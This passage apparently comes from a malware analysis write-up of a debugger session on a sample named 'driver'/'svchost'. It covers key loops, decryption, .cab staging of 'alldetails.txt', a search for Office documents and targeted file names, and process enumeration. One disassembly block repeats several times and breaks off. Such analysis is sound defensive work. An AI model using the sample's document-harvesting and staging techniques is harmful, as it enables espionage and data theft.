
009BF54C 004265C2 driver.004265C2

At this point a *.cab.bak is created with the same name as the original file 0 KB size in filesystem

(initialization)

Further :

009BF73C FD EA FA C3 C9 DD BC A8 ýêúÃÉݼ¨

009BF744 8A 55 37 C6 DB 62 CD EF ŠU7ÆÛbÍï

009BF75C FD EA FA C3 C9 DD BC A8 ýêúÃÉݼ¨

009BF764 8A 55 37 C6 DB 62 CD EF ŠU7ÆÛbÍï

from below :

0040109B |> 8>/MOV CL,BYTE PTR DS:[EAX-20]

0040109E |. 4>|INC EDI

0040109F |. 8>|MOV BYTE PTR DS:[EAX],CL

004010A1 |. 8>|MOV DL,BYTE PTR DS:[EAX-1F]

004010A4 |. 8>|MOV BYTE PTR DS:[EAX+1],DL

004010A7 |. 8>|MOV CL,BYTE PTR DS:[EAX-1E]

004010AA |. 8>|MOV BYTE PTR DS:[EAX+2],CL

004010AD |. 8>|MOV DL,BYTE PTR DS:[EAX-1D]

004010B0 |. 8>|MOV BYTE PTR DS:[EAX+3],DL

004010B3 |. 8>|MOV ECX,DWORD PTR DS:[ESI+14]

004010B6 |. 8>|ADD EAX,4

004010B9 |. 3>|CMP EDI,ECX

004010BB |.^7>\JL SHORT driver.0040109B

clip_image012

clip_image014

clip_image016

The loop above generates particular sequence of 16 byte keys, ostensibly MD5 / a public key for encryption/decryption routines. This needs cryptanalysis and interested parties can analyse it thoroughly in their own time.

clip_image018

Data is decrypted right after the particular loop descibed above. This would ostensibly be embedded doc files in one middle layer of decryption. The logic being, the RSA encryption requred a private key as well, hence brute forcing would be the only option at this point in practical terms, which is unfeasible if the private key is beyond 8 bytes.

Another interesting thing I observed is that specially named files –Naval Cooperation.doc and Survey.doc are dropped and packed as .cab files as well. In the recursive search through filesystem directories, it DOES NOT infect any other file, but searches for these two files and builds .cab files for each of these indicating a particular match required. Since the filename strings are not visible anywhere in memory duriing this particular operation, I surmise it reads the filesystem names and computes a hash and this hash is compared with the ones embedded in the decrypted code. All of this can be replicated by going through the session as described. Interested parties can analyse and document the rest in their own time.

clip_image020

Recursive searching using one of the many goat .doc/.docx/.ppt/.pptx files. It does NOT process them.

Thus in the end , we have the main cab file containing ‘alldetails.txt’ broken in to .bak files as well as these two doc exploit cab backups as well.

Further :

RSA encrypted :

009BF75C FD EA FA C3 C9 DD BC A8 ýêúÃÉݼ¨

009BF764 8A 55 37 C6 DB 62 CD EF ŠU7ÆÛbÍï

009BF76C 56 57 25 7A 9F 8A 99 D2 VW%zŸŠ™Ò

009BF774 15 DF AE 14 CE BD 63 FB ߮νcû

009BF77C 2E AC 2A F1 B1 26 B3 23 .¬*ñ±&³#

009BF784 A4 F9 1D 37 6A 44 7E CC ¤ù7jD~Ì

009BF78C 31 5F 61 F3 80 79 D2 D0 1_aó€yÒÐ

009BF794 24 80 CF E7 4E C4 B1 2B $€ÏçNı+

009BF79C 25 97 90 DC A5 EE 42 0C %—Ü¥îB.

009BF7A4 81 6E 8D EB CF AA 3C C0 nëϪ<À

009BF7AC 99 7C 2A 56 3C 92 68 5A ™|*V<’hZ

009BF7B4 BD FC E5 B1 72 56 D9 71 ½üå±rVÙq

009BF7BC 08 49 89 16 34 DB E1 4C I‰4ÛáL

009BF7C4 89 27 04 FD FB 71 DD 8C ‰’


ýûqÝŒ

009BF7CC EB 88 ED 19 DF 53 0C 55 ëˆíßS.U

009BF7D4 56 74 08 A8 AD 05 D5 24 Vt¨­Õ$

009BF7DC 00 8B DB 8C DF D8 D7 D9 .‹ÛŒßØ×Ù

009BF7E4 89 AC DF 71 24 A9 0A 55 ‰¬ßq$©.U

009BF7EC C8 EC 27 BA 17 34 F0 63 Èì’º4ðc

009BF7F4 9E 98 2F 12 BA 31 25 47 ž˜/º1%G

009BF7FC 39 D3 87 4E 2E E7 77 2D 9Ó‡N.çw-

009BF804 B0 7F 58 3F 0A 4E 7D 78 °X?.N}x

Further :

EAX 0000004D

ECX 008B2419 ASCII “SCF”

EDX 00000009

EBX 009BF5E4

ESP 009BF5A8

EBP 009BF5BC

ESI 00428F90 driver.00428F90

EDI 00000010

EIP 004141FE driver.004141FE

ECS points to MSCF – the cabinet file header value MICROSOFT CABINET FILE

008B2411 02 03 01 C1 07 18 00 4D


Á.M

008B2419 53 43 46 00 00 00 00 C6 SCF….Æ

008B2421 07 00 00 00 00 00 00 2C ……,

008B2429 00 00 00 00 00 00 00 03 …….


008B2431 01 01 00 01 00 00 00 39 ….9

008B2439 30 00 00 4B 00 00 00 01 0..K…

008B2441 00 01 00 E4 13 00 00 00 ..ä…

008B2449 00 00 00 00 00 72 3F A9 …..r?©

008B2451 80 20 00 61 6C 6C 64 65 € .allde

008B2459 74 61 69 6C 73 2E 74 78 tails.tx

008B2461 74 00 C5 70 66 5F 73 07 t.Åpf_s

008B2469 E4 13 43 4B 95 58 5B 73 äCK•X[s

008B2471 A2 CA 16 7E B7 CA FF D0 ¢Ê~·ÊÿÐ

The unaltered cab file .

004141FB |. 8>|CMP EAX,-1

004141FE |. 5>|POP ECX

004141FF |. 7>|JE SHORT driver.00414229

00414201 |. 8>|MOV BYTE PTR DS:[EBX],AL

00414203 |. 8>|MOV EAX,DWORD PTR DS:[ESI+18]

00414206 |. 4>|INC EBX

00414207 |. F>|DEC DWORD PTR SS:[EBP+8]

The cabinet file and its contents are seen at this point.

00401395 |. 4>|DEC EDX

00401396 |. 8>|MOV CL,BYTE PTR DS:[ECX+425090]

0040139C |. 8>|MOV BYTE PTR DS:[EAX-4],CL

0040139F |.^7>|JNZ SHORT driver.0040138E

004013A1 |. 4>|INC ESI

004013A2 |. 8>|CMP ESI,4

004013A5 |.^7>\JL SHORT driver.00401386

Hardware BReakpoint to ENCRYPTED DATA In .DATA

00412EC5 |> 8>LEA ECX,DWORD PTR SS:[EBP-C]

00412EC8 |. 5>PUSH EDI ; /pOverlapped

00412EC9 |. 5>PUSH ECX ; |pBytesWritten

00412ECA |. F>PUSH DWORD PTR SS:[EBP+10] ; |nBytesToWrite

00412ECD |. F>PUSH DWORD PTR SS:[EBP+C] ; |Buffer

00412ED0 |. F>PUSH DWORD PTR DS:[EAX] ; |hFile

00412ED2 |. F>CALL DWORD PTR DS:[<&KERNEL32.WriteFile>] ; \WriteFile

00412ED8 |. 8>TEST EAX,EAX

009BF164 00000060 |hFile = 00000060 (window)

009BF168 008B3430 |Buffer = 008B3430

009BF16C 000007D0 |nBytesToWrite = 7D0 (2000.)

009BF170 009BF58C |pBytesWritten = 009BF58C

009BF174 00000000 \pOverlapped = NULL

009BF178 000007D0

At the next round after .bak creation and .cab deletion :

009BF840 00000000 |Arg1 = 00000000

009BF844 008B0DB9 |Arg2 = 008B0DB9 ASCII “C:”

009BF848 00000002 |Arg3 = 00000002

009BF84C 0000001F |Arg4 = 0000001F

009BF850 7FFDEC00 |Arg5 = 7FFDEC00

009BF854 008B0D71 |Arg6 = 008B0D71 ASCII “*.doc;*.docx;*.ppt;*.pptx”

009BF858 00000019 |Arg7 = 00000019

009BF85C 0000001F \Arg8 = 0000001F

0040F76A |. 5>|PUSH EDX

0040F76B |. C>|MOV BYTE PTR SS:[ESP+758],4

0040F773 |. E>|CALL driver.004035E0

0040F778 |. 8>|LEA ECX,DWORD PTR SS:[ESP+1F8] ; |

0040F77F |. C>|MOV BYTE PTR SS:[ESP+750],3 ; |

0040F787 |. E>|CALL driver.00402270 ; \driver.00402270

009BF5DC 00402600 |Arg1 = 00402600

009BF5E0 009E0319 |Arg2 = 009E0319 ASCII “C:\426984261ed02c31d72337”

009BF5E4 00000019 |Arg3 = 00000019

009BF5E8 0000001F |Arg4 = 0000001F

009BF5EC 009BF800 |Arg5 = 009BF800

009BF5F0 008B0D71 |Arg6 = 008B0D71 ASCII “*.doc;*.docx;*.ppt;*.pptx”

009BF5F4 00000019 |Arg7 = 00000019

009BF5F8 0000001F \Arg8 = 0000001F

00402693 |. 5>|PUSH EDX

00402694 |. C>|MOV BYTE PTR SS:[ESP+268],9

0040269C |. E>|CALL driver.00405CE0

004026A1 |. 8>|ADD ESP,0C

004026A4 |. 8>|LEA ECX,DWORD PTR SS:[ESP+D8] ; |

004026AB |. C>|MOV BYTE PTR SS:[ESP+25C],8 ; |

004026B3 |. E>|CALL driver.00402270 ; \driver.00402270

004026B8 |. 8>|LEA EDX,DWORD PTR SS:[ESP+50]

Here right now :

00402375 |. E>CALL driver.004048D0

0040237A |. 8>MOV EAX,DWORD PTR SS:[ESP+24]

0040237E |. C>MOV BYTE PTR SS:[ESP+23C],2

009BF254 74 2E 64 6F 63 00 00 00 t.doc…

009BF25C 00 00 00 00 00 00 00 00 ……..

009BF264 00 00 00 00 00 …..

 

 

CODE SNAPSHOTS :

00412240 /$ 8>SUB ESP,238
00412246 |. 5>PUSH EBX
00412247 |. 5>PUSH EBP
00412248 |. 5>PUSH ESI
00412249 |. 5>PUSH EDI
0041224A |. 3>XOR EAX,EAX
0041224C |. B>MOV ECX,49
00412251 |. 8>LEA EDI,DWORD PTR SS:[ESP+20]
00412255 |. C>MOV DWORD PTR SS:[ESP+1C],0
0041225D |. 5>PUSH EAX ; /ProcessID => 0
0041225E |. 6>PUSH 2 ; |Flags = TH32CS_SNAPPROCESS
00412260 |. F>REP STOS DWORD PTR ES:[EDI] ; |
00412262 |. E>CALL <JMP.&KERNEL32.CreateToolhelp32Snap>; \CreateToolhelp32Snapshot
00412267 |. 8>MOV ESI,EAX
00412269 |. 8>CMP ESI,-1
0041226C |. 8>MOV DWORD PTR SS:[ESP+14],ESI
00412270 |. 0>JE svchost.0041236F
00412276 |. 8>LEA EAX,DWORD PTR SS:[ESP+1C]
0041227A |. C>MOV DWORD PTR SS:[ESP+1C],128
00412282 |. 5>PUSH EAX ; /pProcessentry
00412283 |. 5>PUSH ESI ; |hSnapshot
00412284 |. E>CALL <JMP.&KERNEL32.Process32First> ; \Process32First
00412289 |. 8>TEST EAX,EAX
0041228B |. 0>JE svchost.0041236F
00412291 |. 8>MOV EBX,DWORD PTR SS:[ESP+24C]
00412298 |> 8>/MOV ECX,DWORD PTR SS:[ESP+24]
0041229C |. 5>|PUSH ECX ; /ProcessId
0041229D |. 6>|PUSH 0 ; |Inheritable = FALSE
0041229F |. 6>|PUSH 410 ; |Access = VM_READ|QUERY_INFORMATION
004122A4 |. F>|CALL DWORD PTR DS:[<&KERNEL32.OpenProce>; \OpenProcess
004122AA |. 8>|MOV EBP,EAX
004122AC |. 8>|TEST EBP,EBP
004122AE |. 0>|JE svchost.00412344
004122B4 |. 8>|LEA EDX,DWORD PTR SS:[ESP+18]
004122B8 |. 8>|LEA EAX,DWORD PTR SS:[ESP+10]
004122BC |. 5>|PUSH EDX
004122BD |. 6>|PUSH 4
004122BF |. 5>|PUSH EAX
004122C0 |. 5>|PUSH EBP
004122C1 |. E>|CALL <JMP.&PSAPI.EnumProcessModules>
004122C6 |. 8>|TEST EAX,EAX
004122C8 |. 7>|JE SHORT svchost.00412344
004122CA |. 8>|MOV EDX,DWORD PTR SS:[ESP+10]
004122CE |. B>|MOV ECX,41
004122D3 |. 3>|XOR EAX,EAX
004122D5 |. 8>|LEA EDI,DWORD PTR SS:[ESP+144]
004122DC |. F>|REP STOS DWORD PTR ES:[EDI]
004122DE |. 8>|LEA ECX,DWORD PTR SS:[ESP+144]
004122E5 |. 6>|PUSH 104
004122EA |. 5>|PUSH ECX
004122EB |. 5>|PUSH EDX
004122EC |. 5>|PUSH EBP
004122ED |. E>|CALL <JMP.&PSAPI.GetModuleFileNameExA>
004122F2 |. 8>|LEA ESI,DWORD PTR SS:[ESP+144]
004122F9 |. 8>|MOV EAX,EBX
004122FB |> 8>|/MOV DL,BYTE PTR DS:[EAX]
004122FD |. 8>||MOV CL,DL
004122FF |. 3>||CMP DL,BYTE PTR DS:[ESI]
00412301 |. 7>||JNZ SHORT svchost.0041231F
00412303 |. 8>||TEST CL,CL
00412305 |. 7>||JE SHORT svchost.0041231B
00412307 |. 8>||MOV DL,BYTE PTR DS:[EAX+1]
0041230A |. 8>||MOV CL,DL
0041230C |. 3>||CMP DL,BYTE PTR DS:[ESI+1]
0041230F |. 7>||JNZ SHORT svchost.0041231F
00412311 |. 8>||ADD EAX,2
00412314 |. 8>||ADD ESI,2
00412317 |. 8>||TEST CL,CL
00412319 |.^7>|\JNZ SHORT svchost.004122FB
0041231B |> 3>|XOR EAX,EAX
0041231D |. E>|JMP SHORT svchost.00412324
0041231F |> 1>|SBB EAX,EAX
00412321 |. 8>|SBB EAX,-1
00412324 |> 8>|TEST EAX,EAX
00412326 |. 7>|JNZ SHORT svchost.00412339
00412328 |. 8>|MOV EAX,DWORD PTR SS:[ESP+24]
0041232C |. 5>|PUSH EAX
0041232D |. E>|CALL svchost.004121B0
00412332 |. 8>|ADD ESP,4
00412335 |. 8>|TEST EAX,EAX
00412337 |. 7>|JNZ SHORT svchost.00412358
00412339 |> 5>|PUSH EBP ; /hObject
0041233A |. F>|CALL DWORD PTR DS:[<&KERNEL32.CloseHand>; \CloseHandle
00412340 |. 8>|MOV ESI,DWORD PTR SS:[ESP+14]
00412344 |> 8>|LEA ECX,DWORD PTR SS:[ESP+1C]
00412348 |. 5>|PUSH ECX ; /pProcessentry
00412349 |. 5>|PUSH ESI ; |hSnapshot
0041234A |. E>|CALL <JMP.&KERNEL32.Process32Next> ; \Process32Next
0041234F |. 8>|TEST EAX,EAX
00412351 |. 7>|JE SHORT svchost.00412368
00412353 |.^E>\JMP svchost.00412298
00412358 |> 5>POP EDI
00412359 |. 5>POP ESI
0041235A |. 5>POP EBP
0041235B |. B>MOV EAX,1
00412360 |. 5>POP EBX
00412361 |. 8>ADD ESP,238
00412367 |. C>RETN
00412368 |> 5>PUSH ESI ; /hObject
00412369 |. F>CALL DWORD PTR DS:[<&KERNEL32.CloseHandl>; \CloseHandle
0041236F |> 5>POP EDI
00412370 |. 5>POP ESI
00412371 |. 5>POP EBP
00412372 |. 3>XOR EAX,EAX
00412374 |. 5>POP EBX
00412375 |. 8>ADD ESP,238
0041237B \. C>RETN
00412240 /$ 8>SUB ESP,238
00412246 |. 5>PUSH EBX
00412247 |. 5>PUSH EBP
00412248 |. 5>PUSH ESI
00412249 |. 5>PUSH EDI
0041224A |. 3>XOR EAX,EAX
0041224C |. B>MOV ECX,49
00412251 |. 8>LEA EDI,DWORD PTR SS:[ESP+20]
00412255 |. C>MOV DWORD PTR SS:[ESP+1C],0
0041225D |. 5>PUSH EAX ; /ProcessID => 0
0041225E |. 6>PUSH 2 ; |Flags = TH32CS_SNAPPROCESS
00412260 |. F>REP STOS DWORD PTR ES:[EDI] ; |
00412262 |. E>CALL <JMP.&KERNEL32.CreateToolhelp32Snap>; \CreateToolhelp32Snapshot
00412267 |. 8>MOV ESI,EAX
00412269 |. 8>CMP ESI,-1
0041226C |. 8>MOV DWORD PTR SS:[ESP+14],ESI
00412270 |. 0>JE svchost.0041236F
00412276 |. 8>LEA EAX,DWORD PTR SS:[ESP+1C]
0041227A |. C>MOV DWORD PTR SS:[ESP+1C],128
00412282 |. 5>PUSH EAX ; /pProcessentry
00412283 |. 5>PUSH ESI ; |hSnapshot
00412284 |. E>CALL <JMP.&KERNEL32.Process32First> ; \Process32First
00412289 |. 8>TEST EAX,EAX
0041228B |. 0>JE svchost.0041236F
00412291 |. 8>MOV EBX,DWORD PTR SS:[ESP+24C]
00412298 |> 8>/MOV ECX,DWORD PTR SS:[ESP+24]
0041229C |. 5>|PUSH ECX ; /ProcessId
0041229D |. 6>|PUSH 0 ; |Inheritable = FALSE
0041229F |. 6>|PUSH 410 ; |Access = VM_READ|QUERY_INFORMATION
004122A4 |. F>|CALL DWORD PTR DS:[<&KERNEL32.OpenProce>; \OpenProcess
004122AA |. 8>|MOV EBP,EAX
004122AC |. 8>|TEST EBP,EBP
004122AE |. 0>|JE svchost.00412344
004122B4 |. 8>|LEA EDX,DWORD PTR SS:[ESP+18]
004122B8 |. 8>|LEA EAX,DWORD PTR SS:[ESP+10]
004122BC |. 5>|PUSH EDX
004122BD |. 6>|PUSH 4
004122BF |. 5>|PUSH EAX
004122C0 |. 5>|PUSH EBP
004122C1 |. E>|CALL <JMP.&PSAPI.EnumProcessModules>
004122C6 |. 8>|TEST EAX,EAX
004122C8 |. 7>|JE SHORT svchost.00412344
004122CA |. 8>|MOV EDX,DWORD PTR SS:[ESP+10]
004122CE |. B>|MOV ECX,41
004122D3 |. 3>|XOR EAX,EAX
004122D5 |. 8>|LEA EDI,DWORD PTR SS:[ESP+144]
004122DC |. F>|REP STOS DWORD PTR ES:[EDI]
004122DE |. 8>|LEA ECX,DWORD PTR SS:[ESP+144]
004122E5 |. 6>|PUSH 104
004122EA |. 5>|PUSH ECX
004122EB |. 5>|PUSH EDX
004122EC |. 5>|PUSH EBP
004122ED |. E>|CALL <JMP.&PSAPI.GetModuleFileNameExA>
004122F2 |. 8>|LEA ESI,DWORD PTR SS:[ESP+144]
004122F9 |. 8>|MOV EAX,EBX
004122FB |> 8>|/MOV DL,BYTE PTR DS:[EAX]
004122FD |. 8>||MOV CL,DL
004122FF |. 3>||CMP DL,BYTE PTR DS:[ESI]
00412301 |. 7>||JNZ SHORT svchost.0041231F
00412303 |. 8>||TEST CL,CL
00412305 |. 7>||JE SHORT svchost.0041231B
00412307 |. 8>||MOV DL,BYTE PTR DS:[EAX+1]
0041230A |. 8>||MOV CL,DL
0041230C |. 3>||CMP DL,BYTE PTR DS:[ESI+1]
0041230F |. 7>||JNZ SHORT svchost.0041231F
00412311 |. 8>||ADD EAX,2
00412314 |. 8>||ADD ESI,2
00412317 |. 8>||TEST CL,CL
00412319 |.^7>|\JNZ SHORT svchost.004122FB
0041231B |> 3>|XOR EAX,EAX
0041231D |. E>|JMP SHORT svchost.00412324
0041231F |> 1>|SBB EAX,EAX
00412321 |. 8>|SBB EAX,-1
00412324 |> 8>|TEST EAX,EAX
00412326 |. 7>|JNZ SHORT svchost.00412339
00412328 |. 8>|MOV EAX,DWORD PTR SS:[ESP+24]
0041232C |. 5>|PUSH EAX
0041232D |. E>|CALL svchost.004121B0
00412332 |. 8>|ADD ESP,4
00412335 |. 8>|TEST EAX,EAX
00412337 |. 7>|JNZ SHORT svchost.00412358
00412339 |> 5>|PUSH EBP ; /hObject
0041233A |. F>|CALL DWORD PTR DS:[<&KERNEL32.CloseHand>; \CloseHandle
00412340 |. 8>|MOV ESI,DWORD PTR SS:[ESP+14]
00412344 |> 8>|LEA ECX,DWORD PTR SS:[ESP+1C]
00412348 |. 5>|PUSH ECX ; /pProcessentry
00412349 |. 5>|PUSH ESI ; |hSnapshot
0041234A |. E>|CALL <JMP.&KERNEL32.Process32Next> ; \Process32Next
0041234F |. 8>|TEST EAX,EAX
00412351 |. 7>|JE SHORT svchost.00412368
00412353 |.^E>\JMP svchost.00412298
00412358 |> 5>POP EDI
00412359 |. 5>POP ESI
0041235A |. 5>POP EBP
0041235B |. B>MOV EAX,1
00412360 |. 5>POP EBX
00412361 |. 8>ADD ESP,238
00412367 |. C>RETN
00412368 |> 5>PUSH ESI ; /hObject
00412369 |. F>CALL DWORD PTR DS:[<&KERNEL32.CloseHandl>; \CloseHandle
0041236F |> 5>POP EDI
00412370 |. 5>POP ESI
00412371 |. 5>POP EBP
00412372 |. 3>XOR EAX,EAX
00412374 |. 5>POP EBX
00412375 |. 8>ADD ESP,238
0041237B \. C>RETN

00412240 /$ 8>SUB ESP,238
00412246 |. 5>PUSH EBX
00412247 |. 5>PUSH EBP
00412248 |. 5>PUSH ESI
00412249 |. 5>PUSH EDI
0041224A |. 3>XOR EAX,EAX
0041224C |. B>MOV ECX,49
00412251 |. 8>LEA EDI,DWORD PTR SS:[ESP+20]
00412255 |. C>MOV DWORD PTR SS:[ESP+1C],0
0041225D |. 5>PUSH EAX ; /ProcessID => 0
0041225E |. 6>PUSH 2 ; |Flags = TH32CS_SNAPPROCESS
00412260 |. F>REP STOS DWORD PTR ES:[EDI] ; |
00412262 |. E>CALL <JMP.&KERNEL32.CreateToolhelp32Snap>; \CreateToolhelp32Snapshot
00412267 |. 8>MOV ESI,EAX
00412269 |. 8>CMP ESI,-1
0041226C |. 8>MOV DWORD PTR SS:[ESP+14],ESI
00412270 |. 0>JE svchost.0041236F
00412276 |. 8>LEA EAX,DWORD PTR SS:[ESP+1C]
0041227A |. C>MOV DWORD PTR SS:[ESP+1C],128
00412282 |. 5>PUSH EAX ; /pProcessentry
00412283 |. 5>PUSH ESI ; |hSnapshot
00412284 |. E>CALL <JMP.&KERNEL32.Process32First> ; \Process32First
00412289 |. 8>TEST EAX,EAX
0041228B |. 0>JE svchost.0041236F
00412291 |. 8>MOV EBX,DWORD PTR SS:[ESP+24C]
00412298 |> 8>/MOV ECX,DWORD PTR SS:[ESP+24]
0041229C |. 5>|PUSH ECX ; /ProcessId
0041229D |. 6>|PUSH 0 ; |Inheritable = FALSE
0041229F |. 6>|PUSH 410 ; |Access = VM_READ|QUERY_INFORMATION
004122A4 |. F>|CALL DWORD PTR DS:[<&KERNEL32.OpenProce>; \OpenProcess
004122AA |. 8>|MOV EBP,EAX
004122AC |. 8>|TEST EBP,EBP
004122AE |. 0>|JE svchost.00412344
004122B4 |. 8>|LEA EDX,DWORD PTR SS:[ESP+18]
004122B8 |. 8>|LEA EAX,DWORD PTR SS:[ESP+10]
004122BC |. 5>|PUSH EDX
004122BD |. 6>|PUSH 4
004122BF |. 5>|PUSH EAX
004122C0 |. 5>|PUSH EBP
004122C1 |. E>|CALL <JMP.&PSAPI.EnumProcessModules>
004122C6 |. 8>|TEST EAX,EAX
004122C8 |. 7>|JE SHORT svchost.00412344
004122CA |. 8>|MOV EDX,DWORD PTR SS:[ESP+10]
004122CE |. B>|MOV ECX,41
004122D3 |. 3>|XOR EAX,EAX
004122D5 |. 8>|LEA EDI,DWORD PTR SS:[ESP+144]
004122DC |. F>|REP STOS DWORD PTR ES:[EDI]
004122DE |. 8>|LEA ECX,DWORD PTR SS:[ESP+144]
004122E5 |. 6>|PUSH 104
004122EA |. 5>|PUSH ECX
004122EB |. 5>|PUSH EDX
004122EC |. 5>|PUSH EBP
004122ED |. E>|CALL <JMP.&PSAPI.GetModuleFileNameExA>
004122F2 |. 8>|LEA ESI,DWORD PTR SS:[ESP+144]
004122F9 |. 8>|MOV EAX,EBX
004122FB |> 8>|/MOV DL,BYTE PTR DS:[EAX]
004122FD |. 8>||MOV CL,DL
004122FF |. 3>||CMP DL,BYTE PTR DS:[ESI]
00412301 |. 7>||JNZ SHORT svchost.0041231F
00412303 |. 8>||TEST CL,CL
00412305 |. 7>||JE SHORT svchost.0041231B
00412307 |. 8>||MOV DL,BYTE PTR DS:[EAX+1]
0041230A |. 8>||MOV CL,DL
0041230C |. 3>||CMP DL,BYTE PTR DS:[ESI+1]
0041230F |. 7>||JNZ SHORT svchost.0041231F
00412311 |. 8>||ADD EAX,2
00412314 |. 8>||ADD ESI,2
00412317 |. 8>||TEST CL,CL
00412319 |.^7>|\JNZ SHORT svchost.004122FB
0041231B |> 3>|XOR EAX,EAX
0041231D |. E>|JMP SHORT svchost.00412324
0041231F |> 1>|SBB EAX,EAX
00412321 |. 8>|SBB EAX,-1
00412324 |> 8>|TEST EAX,EAX
00412326 |. 7>|JNZ SHORT svchost.00412339
00412328 |. 8>|MOV EAX,DWORD PTR SS:[ESP+24]
0041232C |. 5>|PUSH EAX
0041232D |. E>|CALL svchost.004121B0
00412332 |. 8>|ADD ESP,4
00412335 |. 8>|TEST EAX,EAX
00412337 |. 7>|JNZ SHORT svchost.00412358
00412339 |> 5>|PUSH EBP ; /hObject
0041233A |. F>|CALL DWORD PTR DS:[<&KERNEL32.CloseHand>; \CloseHandle
00412340 |. 8>|MOV ESI,DWORD PTR SS:[ESP+14]
00412344 |> 8>|LEA ECX,DWORD PTR SS:[ESP+1C]
00412348 |. 5>|PUSH ECX ; /pProcessentry
00412349 |. 5>|PUSH ESI ; |hSnapshot
0041234A |. E>|CALL <JMP.&KERNEL32.Process32Next> ; \Process32Next
0041234F |. 8>|TEST EAX,EAX
00412351 |. 7>|JE SHORT svchost.00412368
00412353 |.^E>\JMP svchost.00412298
00412358 |> 5>POP EDI
00412359 |. 5>POP ESI
0041235A |. 5>POP EBP
0041235B |. B>MOV EAX,1
00412360 |. 5>POP EBX
00412361 |. 8>ADD ESP,238
00412367 |. C>RETN
00412368 |> 5>PUSH ESI ; /hObject
00412369 |. F>CALL DWORD PTR DS:[<&KERNEL32.CloseHandl>; \CloseHandle
0041236F |> 5>POP EDI
00412370 |. 5>POP ESI
00412371 |. 5>POP EBP
00412372 |. 3>XOR EAX,EAX
00412374 |. 5>POP EBX
00412375 |. 8>ADD ESP,238
0041237B \. C>RETN

00412240 /$ 8>SUB ESP,238
00412246 |. 5>PUSH EBX
00412247 |. 5>PUSH EBP
00412248 |. 5>PUSH ESI
00412249 |. 5>PUSH EDI
0041224A |. 3>XOR EAX,EAX
0041224C |. B>MOV ECX,49
00412251 |. 8>LEA EDI,DWORD PTR SS:[ESP+20]
00412255 |. C>MOV DWORD PTR SS:[ESP+1C],0
0041225D |. 5>PUSH EAX ; /ProcessID => 0
0041225E |. 6>PUSH 2 ; |Flags = TH32CS_SNAPPROCESS
00412260 |. F>REP STOS DWORD PTR ES:[EDI] ; |
00412262 |. E>CALL <JMP.&KERNEL32.CreateToolhelp32Snap>; \CreateToolhelp32Snapshot
00412267 |. 8>MOV ESI,EAX
00412269 |. 8>CMP ESI,-1
0041226C |. 8>MOV DWORD PTR SS:[ESP+14],ESI
00412270 |. 0>JE svchost.0041236F
00412276 |. 8>LEA EAX,DWORD PTR SS:[ESP+1C]
0041227A |. C>MOV DWORD PTR SS:[ESP+1C],128
00412282 |. 5>PUSH EAX ; /pProcessentry
00412283 |. 5>PUSH ESI ; |hSnapshot
00412284 |. E>CALL <JMP.&KERNEL32.Process32First> ; \Process32First
00412289 |. 8>TEST EAX,EAX
0041228B |. 0>JE svchost.0041236F
00412291 |. 8>MOV EBX,DWORD PTR SS:[ESP+24C]
00412298 |> 8>/MOV ECX,DWORD PTR SS:[ESP+24]
0041229C |. 5>|PUSH ECX ; /ProcessId
0041229D |. 6>|PUSH 0 ; |Inheritable = FALSE
0041229F |. 6>|PUSH 410 ; |Access = VM_READ|QUERY_INFORMATION
004122A4 |. F>|CALL DWORD PTR DS:[<&KERNEL32.OpenProce>; \OpenProcess
004122AA |. 8>|MOV EBP,EAX
004122AC |. 8>|TEST EBP,EBP
004122AE |. 0>|JE svchost.00412344
004122B4 |. 8>|LEA EDX,DWORD PTR SS:[ESP+18]
004122B8 |. 8>|LEA EAX,DWORD PTR SS:[ESP+10]
004122BC |. 5>|PUSH EDX
004122BD |. 6>|PUSH 4
004122BF |. 5>|PUSH EAX
004122C0 |. 5>|PUSH EBP
004122C1 |. E>|CALL <JMP.&PSAPI.EnumProcessModules>
004122C6 |. 8>|TEST EAX,EAX
004122C8 |. 7>|JE SHORT svchost.00412344
004122CA |. 8>|MOV EDX,DWORD PTR SS:[ESP+10]
004122CE |. B>|MOV ECX,41
004122D3 |. 3>|XOR EAX,EAX
004122D5 |. 8>|LEA EDI,DWORD PTR SS:[ESP+144]
004122DC |. F>|REP STOS DWORD PTR ES:[EDI]
004122DE |. 8>|LEA ECX,DWORD PTR SS:[ESP+144]
004122E5 |. 6>|PUSH 104
004122EA |. 5>|PUSH ECX
004122EB |. 5>|PUSH EDX
004122EC |. 5>|PUSH EBP
004122ED |. E>|CALL <JMP.&PSAPI.GetModuleFileNameExA>
004122F2 |. 8>|LEA ESI,DWORD PTR SS:[ESP+144]
004122F9 |. 8>|MOV EAX,EBX
004122FB |> 8>|/MOV DL,BYTE PTR DS:[EAX]
004122FD |. 8>||MOV CL,DL
004122FF |. 3>||CMP DL,BYTE PTR DS:[ESI]
00412301 |. 7>||JNZ SHORT svchost.0041231F
00412303 |. 8>||TEST CL,CL
00412305 |. 7>||JE SHORT svchost.0041231B
00412307 |. 8>||MOV DL,BYTE PTR DS:[EAX+1]
0041230A |. 8>||MOV CL,DL
0041230C |. 3>||CMP DL,BYTE PTR DS:[ESI+1]
0041230F |. 7>||JNZ SHORT svchost.0041231F
00412311 |. 8>||ADD EAX,2
00412314 |. 8>||ADD ESI,2
00412317 |. 8>||TEST CL,CL
00412319 |.^7>|\JNZ SHORT svchost.004122FB
0041231B |> 3>|XOR EAX,EAX
0041231D |. E>|JMP SHORT svchost.00412324
0041231F |> 1>|SBB EAX,EAX
00412321 |. 8>|SBB EAX,-1
00412324 |> 8>|TEST EAX,EAX
00412326 |. 7>|JNZ SHORT svchost.00412339
00412328 |. 8>|MOV EAX,DWORD PTR SS:[ESP+24]
0041232C |. 5>|PUSH EAX
0041232D |. E>|CALL svchost.004121B0
00412332 |. 8>|ADD ESP,4
00412335 |. 8>|TEST EAX,EAX
00412337 |. 7>|JNZ SHORT svchost.00412358
00412339 |> 5>|PUSH EBP ; /hObject
0041233A |. F>|CALL DWORD PTR DS:[<&KERNEL32.CloseHand>; \CloseHandle
00412340 |. 8>|MOV ESI,DWORD PTR SS:[ESP+14]
00412344 |> 8>|LEA ECX,DWORD PTR SS:[ESP+1C]
00412348 |. 5>|PUSH ECX ; /pProcessentry
00412349 |. 5>|PUSH ESI ; |hSnapshot
0041234A |. E>|CALL <JMP.&KERNEL32.Process32Next> ; \Process32Next
0041234F |. 8>|TEST EAX,EAX
00412351 |. 7>|JE SHORT svchost.00412368
00412353 |.^E>\JMP svchost.00412298
00412358 |> 5>POP EDI
00412359 |. 5>POP ESI
0041235A |. 5>POP EBP
0041235B |. B>MOV EAX,1
00412360 |. 5>POP EBX
00412361 |. 8>ADD ESP,238
00412367 |. C>RETN
00412368 |> 5>PUSH ESI ; /hObject
